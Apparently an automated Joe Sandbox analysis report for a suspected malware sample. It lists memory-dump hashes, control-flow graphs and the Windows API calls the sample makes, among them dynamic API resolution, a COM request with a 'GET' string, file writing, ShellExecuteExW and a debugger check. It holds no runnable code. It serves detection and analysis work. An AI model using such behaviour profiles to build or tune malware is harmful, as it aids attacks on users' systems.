                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4685cc0ee40e391196cabbd04a82533a7b1d5a776b12f4d92ec8d4e3bf8e88e
                                        • Instruction ID: c5a75172b9c18fba57d49bd79105ec5c948e6e6ffca2d3968721af4f6c328033
                                        • Opcode Fuzzy Hash: b4685cc0ee40e391196cabbd04a82533a7b1d5a776b12f4d92ec8d4e3bf8e88e
                                        • Instruction Fuzzy Hash: 65F0F031A04346CFD765CF21D6406A2FBB1EF80304B1888EEE08247921D774E48ECB40
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3d04c9a9191a77302d9febda051de5ba4e935beff62c6dcbe712a1d87314255
                                        • Instruction ID: 0f3b1aa4e807c090585478e421aed8114a29b80319366ab6bf31887c20bb59fb
                                        • Opcode Fuzzy Hash: c3d04c9a9191a77302d9febda051de5ba4e935beff62c6dcbe712a1d87314255
                                        • Instruction Fuzzy Hash: 16E0DF72B400004FCA262668A0647FE2B97CBD9A15F5804AEE20E83383CD258C038780
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ccb929ed49e76881cf84c44937fe2ffae841b0df4a1098ed4e8553b4cdb87ddd
                                        • Instruction ID: 3cf8d013fd64cc28784ded6f4a2989cf9a2538a6e806bbea1f2f9f2df55bbde1
                                        • Opcode Fuzzy Hash: ccb929ed49e76881cf84c44937fe2ffae841b0df4a1098ed4e8553b4cdb87ddd
                                        • Instruction Fuzzy Hash: D6E068302093C28FCB135B39D400495BFE5CF8721030944DAD489CB523CB20A88AC781
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: feb6145063bb71dc4d3bf5dd3a7268d39c33248f5c2e7e056042d330deb83a80
                                        • Instruction ID: 9414ad72574e6de5a67a77666ed854937e24ec0f5462a7a8df7fb76936d7ec3b
                                        • Opcode Fuzzy Hash: feb6145063bb71dc4d3bf5dd3a7268d39c33248f5c2e7e056042d330deb83a80
                                        • Instruction Fuzzy Hash: C2F03930E49308AFCB41DFA8D45558DBFF4AF46300F0040E9E849E7351EA74AA44CF82
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c181feed7aa77b87f872bd05968111e146c045ed5449b48f21006af873090b8
                                        • Instruction ID: 21063527bbf5d18d64d243377f6f1da500d18cd5917bd149efc3ccf41923df03
                                        • Opcode Fuzzy Hash: 9c181feed7aa77b87f872bd05968111e146c045ed5449b48f21006af873090b8
                                        • Instruction Fuzzy Hash: CFE0DF31B841004B83AA7EB480A012E76C3AF85701388CCF9DA0BAB75CDE249D8DC782
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d1a21c8f88cd50b546b17ae4c42c4c6baf594ddf65501548e88a22ee13cb87e5
                                        • Instruction ID: 078fef13db14cbef74e37a6080c4492624b7aefe8f1e9c36322ef7def2a7c504
                                        • Opcode Fuzzy Hash: d1a21c8f88cd50b546b17ae4c42c4c6baf594ddf65501548e88a22ee13cb87e5
                                        • Instruction Fuzzy Hash: 62E0C232B401208FC71E1E75A0515FC3B67DBE935171405AEE10A83393DA279C038B80
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 661cfd9292a6c4bdd4d8d230869f62ec1a3d8076c4d23b357f342556c564aa80
                                        • Instruction ID: 81a82bc6154902c2654596ff1a072f15bd28edef9965d29e24cda2a145be5aaa
                                        • Opcode Fuzzy Hash: 661cfd9292a6c4bdd4d8d230869f62ec1a3d8076c4d23b357f342556c564aa80
                                        • Instruction Fuzzy Hash: 67E09270E4420CAFCB44EFA8D55459DBBF5EB48300F0085A9A809A7354EA349A558F81
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ec3b27b109c256a2466e9befb2e2b0aa175385121f0c8968f80913ec00f2973d
                                        • Instruction ID: 2470b8c0198e9d0836a7008612fa7ac13d7ae97261c5e7175aa2f82102811a0a
                                        • Opcode Fuzzy Hash: ec3b27b109c256a2466e9befb2e2b0aa175385121f0c8968f80913ec00f2973d
                                        • Instruction Fuzzy Hash: 4BD0A7313407164BC614A77EE94049BB7DADFC82213008869E90E87624DF70FC8287C4
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: efb2412045d1622eba279a3fcdbf5dc4b80bce16608e16026c88b342a084f1c7
                                        • Instruction ID: 85509320fb14a39aad7550f5507eae313cfce51bccb6ce316a34e9375dc6d0cc
                                        • Opcode Fuzzy Hash: efb2412045d1622eba279a3fcdbf5dc4b80bce16608e16026c88b342a084f1c7
                                        • Instruction Fuzzy Hash: 4CD0A931B002248B870E2A2AA00046A37ABE78C2903104969F20C83316DB33AC038BC0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09e76a11a5da1c699eafba37ceb6683eaee4d84ef0e63a4975a755be63a36255
                                        • Instruction ID: 1029e4413ea4b5cfe65bc9d422aad5b158c505ca90754845d692e46dc1870e10
                                        • Opcode Fuzzy Hash: 09e76a11a5da1c699eafba37ceb6683eaee4d84ef0e63a4975a755be63a36255
                                        • Instruction Fuzzy Hash: 1FD080314883C85FD74A7755F0AC0E43F71DB8611470405D6D045CF9FBCD18451B8744
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1558e5e9e5c183c10e3d47c44f618ee3485a9e25121321fbaf13277f7d713b9a
                                        • Instruction ID: 85e3785f83d1cf52bb3081d3676cffda552f16bc1297101bfaaa1df22a130705
                                        • Opcode Fuzzy Hash: 1558e5e9e5c183c10e3d47c44f618ee3485a9e25121321fbaf13277f7d713b9a
                                        • Instruction Fuzzy Hash: ACD0523088878B8FD3031F68A818384BF29AB02300F810381E48A8F1E6D768189B8BC5
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f61e8f465939ba2c45c2e351d6bc0c8edb7ca9226e5c86b4e1f7698cd52ff61
                                        • Instruction ID: f101e098946415b8524de0e21e05a55ad988b050aeae2b9ada63662fbee095f0
                                        • Opcode Fuzzy Hash: 2f61e8f465939ba2c45c2e351d6bc0c8edb7ca9226e5c86b4e1f7698cd52ff61
                                        • Instruction Fuzzy Hash: C3D012B1504742AFE3430F90A909748FF74BF63B11F0282C2E296CB0D2C37009A2DB11
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 231b524cfc9da130a457714af67865b314f6a21738a8f0b564b5ed25b4c1690b
                                        • Instruction ID: 3e6ada4b1867eef2dbc8be19abf8c5823ab6018f05383213cc7d12e54473c899
                                        • Opcode Fuzzy Hash: 231b524cfc9da130a457714af67865b314f6a21738a8f0b564b5ed25b4c1690b
                                        • Instruction Fuzzy Hash: 3FD0A9324882884FC7228B70E8623803F304F23220F2802D7D0AACB1E3CA620406CB00
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b1c0042a2286bc08f3e769cae51f5d44a5ad83a2d8837b498cace065596d99b
                                        • Instruction ID: 80814bef7264e78bf1fcc97b1cd80377c2f84cb0eed2f6f0daf0e5efe789fce4
                                        • Opcode Fuzzy Hash: 2b1c0042a2286bc08f3e769cae51f5d44a5ad83a2d8837b498cace065596d99b
                                        • Instruction Fuzzy Hash: 71D0C9706186828FDB135F58D954745BF60EB57310F450AC6D4818F2E3D7249442CB85
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc439fa0959c3ee1f3a81eada13cf25c3df8c26edbd6589acf6af165cb87f346
                                        • Instruction ID: 7f6bbf46f1aba0c664ee699f904e2a6cd1eb6aacd4aaa62ad50c83d9e92534c9
                                        • Opcode Fuzzy Hash: fc439fa0959c3ee1f3a81eada13cf25c3df8c26edbd6589acf6af165cb87f346
                                        • Instruction Fuzzy Hash: 01D01275D8D2C44FC7158FB972553E83F759BA6155B0904AEE45D87643D622442BCB00
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cbcb0b104adf8f8a0e3edf4d7b1ffa11330cf1a68e7ef893781155d8c603524d
                                        • Instruction ID: a0bc1ed493f592d0385ebeffd4ec773f03ce714031606dc7f51bdbf093adf448
                                        • Opcode Fuzzy Hash: cbcb0b104adf8f8a0e3edf4d7b1ffa11330cf1a68e7ef893781155d8c603524d
                                        • Instruction Fuzzy Hash: 33C08C80A082E05FDF16A336ACA068A3FF14FDF2287AE00CB84608B493CD25C40BA705
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd15f7a15743f992b7e2bf5f5bc514035318ca0350f0d61117bffc2eba43e7f7
                                        • Instruction ID: 784e555dee0460bbbb8b4ddbb62b0aa44f26b53dff680fd04e85c8b6081ba6dc
                                        • Opcode Fuzzy Hash: bd15f7a15743f992b7e2bf5f5bc514035318ca0350f0d61117bffc2eba43e7f7
                                        • Instruction Fuzzy Hash: C5C08CB86402016FE304AF209884A277AE3FFD8701F01C818E101C7328CA30C850DAA0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8b5c5173a0ab54f4021590a80e8dbbb7fe6876bdd8638b4d60a8134cad605ef
                                        • Instruction ID: baa4c11204d561ebab0aaad372d3cd25a7cd799a7927c7323506edef4ff67b08
                                        • Opcode Fuzzy Hash: a8b5c5173a0ab54f4021590a80e8dbbb7fe6876bdd8638b4d60a8134cad605ef
                                        • Instruction Fuzzy Hash: 6CB0123108020D4FC540F757F504A48775CE7C42087405620F00C0661D6FA869554F88
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cb39c5b538c58d7e40bc41631d2dcd0d6bcca9c7cba2576a4cb1c31f8f91bed2
                                        • Instruction ID: 990c502df51c3972410d383bbe99392f57adb3778999f998c2e8c833341ab504
                                        • Opcode Fuzzy Hash: cb39c5b538c58d7e40bc41631d2dcd0d6bcca9c7cba2576a4cb1c31f8f91bed2
                                        • Instruction Fuzzy Hash: 90B0123205430C8787106758F807511739C56407347344B55A13D4F2E1CE22B8228555
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8416bc359407854a9fcd7c007e2571de24352e35570cec1ca33d35cebe7a6ca8
                                        • Instruction ID: 395b9e1d17b9d87280d5ecc738d95fa29bd4a005181f0799c5e593304709d8cb
                                        • Opcode Fuzzy Hash: 8416bc359407854a9fcd7c007e2571de24352e35570cec1ca33d35cebe7a6ca8
                                        • Instruction Fuzzy Hash: 2EB09274C883488F83409F99B6043283BBCA2856943400826D41D83702E73414268A50
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 565ae62cb5056e5a0423b7cfe98a2db882894f3468db00d73dff80687c400186
                                        • Instruction ID: b1b53f300c97e9b2c71845fa807f5aee27201da94ec94a51eb82c0077a898dc2
                                        • Opcode Fuzzy Hash: 565ae62cb5056e5a0423b7cfe98a2db882894f3468db00d73dff80687c400186
                                        • Instruction Fuzzy Hash: E1B0123058424E4FC7007BB6F514A847B5DD7447047804720B00D066199B646D564F94

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 115 851f00-851f66 call 852400 call 8511a0 call 851d70 122 851f78-851f88 115->122 123 851f68-851f73 call 851e60 115->123 123->122
                                        APIs
                                        • new.LIBCMT ref: 00851F3A
                                          • Part of subcall function 008511A0: GetModuleHandleW.KERNEL32(KERNEL32), ref: 008511B9
                                          • Part of subcall function 008511A0: GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 008511EC
                                          • Part of subcall function 008511A0: GetProcAddress.KERNEL32(00000000,wsprintfW), ref: 00851226
                                          • Part of subcall function 008511A0: GetProcAddress.KERNEL32(41797261,CoInitialize), ref: 00851243
                                          • Part of subcall function 00851D70: GetConsoleWindow.KERNEL32 ref: 00851D8B
                                          • Part of subcall function 00851D70: ShellExecuteExW.SHELL32(0000003C), ref: 00851E2E
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: AddressProc$ConsoleExecuteHandleModuleShellWindow
                                        • String ID:
                                        • API String ID: 2699191150-0
                                        • Opcode ID: 35250e0829b1440e5a89fc2f4ec2a4209009ce43d6bca4431e7efa9cedded3c7
                                        • Instruction ID: ff97ce8fc8b2c4508e0473d07dc4af783c4cee66033c7bb5abbbf7ce80180426
                                        • Opcode Fuzzy Hash: 35250e0829b1440e5a89fc2f4ec2a4209009ce43d6bca4431e7efa9cedded3c7
                                        • Instruction Fuzzy Hash: C3018FB0A046449FCB14DF68EE05B1977E8FB08715F405279FC18C7380EB74A9048B81

                                        Control-flow Graph

                                        APIs
                                        • CoCreateInstance.OLE32(00863E00,00000000,00000017,00863E10,?,3B4B4A20), ref: 00851988
                                          • Part of subcall function 008510A0: new.LIBCMT ref: 008510C9
                                          • Part of subcall function 008510A0: SysAllocString.OLEAUT32 ref: 008510F2
                                          • Part of subcall function 008510A0: _com_issue_error.COMSUPP ref: 00851108
                                          • Part of subcall function 008510A0: _com_issue_error.COMSUPP ref: 00851121
                                        • new.LIBCMT ref: 008519C1
                                        • _com_util::ConvertStringToBSTR.COMSUPP ref: 008519EA
                                        • _com_issue_error.COMSUPP ref: 00851A08
                                        • InterlockedDecrement.KERNEL32(00000008), ref: 00851A45
                                        • SysFreeString.OLEAUT32(00000000), ref: 00851A5C
                                        • InterlockedDecrement.KERNEL32(?), ref: 00851A9B
                                        • SysFreeString.OLEAUT32(00000000), ref: 00851AB0
                                        • SafeArrayGetDim.OLEAUT32(?), ref: 00851B5E
                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00851B7C
                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,00000000), ref: 00851B91
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00851BAA
                                        • lstrcatW.KERNEL32(?,00863D2C), ref: 00851C14
                                        • lstrcatW.KERNEL32(?,00000002), ref: 00851C1E
                                        • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00851CE2
                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00851D0C
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00851D28
                                        • VariantClear.OLEAUT32(?), ref: 00851D3C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ArraySafe$String$_com_issue_error$BoundCreateDataDecrementFileFreeInterlockedlstrcat$AccessAllocClearConvertInstanceUnaccessVariantWrite_com_util::
                                        • String ID: $"$%$.$3$GET$M$Pou$T$a$g$l$n$o$r$x
                                        • API String ID: 2252369171-1015696063
                                        • Opcode ID: 8f8af75e2248928f688c719ad3502109c904151de5895974c19f55aebd7503f6
                                        • Instruction ID: d56191d534f9e7e359ab3a03a6c40b1f028b518ef0bfacdebecb59c5bbfc6e8b
                                        • Opcode Fuzzy Hash: 8f8af75e2248928f688c719ad3502109c904151de5895974c19f55aebd7503f6
                                        • Instruction Fuzzy Hash: 42C14C719016299FDB219F64DC8CB9ABBB8FF04705F1042A8E909E7291DB759E88CF50

                                        Control-flow Graph

                                        APIs
                                        • GetConsoleWindow.KERNEL32 ref: 00851D8B
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00851E2E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ConsoleExecuteShellWindow
                                        • String ID: <$r
                                        • API String ID: 1235396993-2647864400
                                        • Opcode ID: 92f05b285a24192e7c9c9e0f19bc2bff0202e48a592ad7bc2ae6deb31f64313b
                                        • Instruction ID: edafc0a400d05c895dd7fc4979f61555f0965989d9c20256bc26ddcba869edef
                                        • Opcode Fuzzy Hash: 92f05b285a24192e7c9c9e0f19bc2bff0202e48a592ad7bc2ae6deb31f64313b
                                        • Instruction Fuzzy Hash: 0421C970A012189FDB10DF98DD89B9977F8FB48304F4151E9E908EB391DBB5AA48CF45

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 77 8589a8-8589ad 78 8589af-8589c7 77->78 79 8589d5-8589de 78->79 80 8589c9-8589cd 78->80 82 8589f0 79->82 83 8589e0-8589e3 79->83 80->79 81 8589cf-8589d3 80->81 87 858a50-858a54 81->87 86 8589f2-8589ff GetStdHandle 82->86 84 8589e5-8589ea 83->84 85 8589ec-8589ee 83->85 84->86 85->86 88 858a01-858a03 86->88 89 858a0e 86->89 87->78 90 858a5a-858a5d 87->90 88->89 91 858a05-858a0c GetFileType 88->91 92 858a10-858a12 89->92 91->92 93 858a14-858a1f 92->93 94 858a32-858a44 92->94 95 858a27-858a2a 93->95 96 858a21-858a25 93->96 94->87 97 858a46-858a49 94->97 95->87 98 858a2c-858a30 95->98 96->87 97->87 98->87
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 008589F4
                                        • GetFileType.KERNEL32(00000000), ref: 00858A06
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: FileHandleType
                                        • String ID:
                                        • API String ID: 3000768030-0
                                        • Opcode ID: cf290126331aa08ec1a4f4fb53f524c49cf77017627f10c6cedd426424f37d3c
                                        • Instruction ID: b9c11a5cfdf443b2bb4ff19938fca21fd89acd73f6e779346e46768d70886152
                                        • Opcode Fuzzy Hash: cf290126331aa08ec1a4f4fb53f524c49cf77017627f10c6cedd426424f37d3c
                                        • Instruction Fuzzy Hash: 3C11A231104762C6CB364A3D8C88632BE95F756337B380B1BD8B7E61F2CF24D8899646
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 0085551F
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00855529
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00855536
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 6ad6fa65bd0fad532e5cb94bbf63e0da9314c882b0d4c0b66f8fa01822fb1ef8
                                        • Instruction ID: 9f4b7c4aeb43490a60753438ea874f7eb4575a14322e8415d676beb20874d727
                                        • Opcode Fuzzy Hash: 6ad6fa65bd0fad532e5cb94bbf63e0da9314c882b0d4c0b66f8fa01822fb1ef8
                                        • Instruction Fuzzy Hash: 0731D4749016289BCB21DF28DC8979DBBB8FF08311F5041EAE91CA7251EB349F858F45
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000003,?,00855A67,00000003,00864778,0000000C,00855B7A,00000003,00000002,00000000,?,00856B43,00000003), ref: 00855AB2
                                        • TerminateProcess.KERNEL32(00000000,?,00855A67,00000003,00864778,0000000C,00855B7A,00000003,00000002,00000000,?,00856B43,00000003), ref: 00855AB9
                                        • ExitProcess.KERNEL32 ref: 00855ACB
                                        Memory Dump Source
                                        • Source File: 00000012.00000002.4148259259.0000000000851000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00850000, based on PE: true
                                        • Associated: 00000012.00000002.4147953437.0000000000850000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148441425.000000000085F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 00000012.00000002.4150058013.0000000000868000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_18_2_850000_Mon17742f90b916675f2.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 4f3c56529081c54b0acf7ae60daacccb634af50a83c24b1eece9d78c8bee70bc
                                        • Instruction ID: 4055c5a30a922216334bc8e6ed145ef94861e8b600d6481f61ff64caa620ac83
                                        • Opcode Fuzzy Hash: 4f3c56529081c54b0acf7ae60daacccb634af50a83c24b1eece9d78c8bee70bc
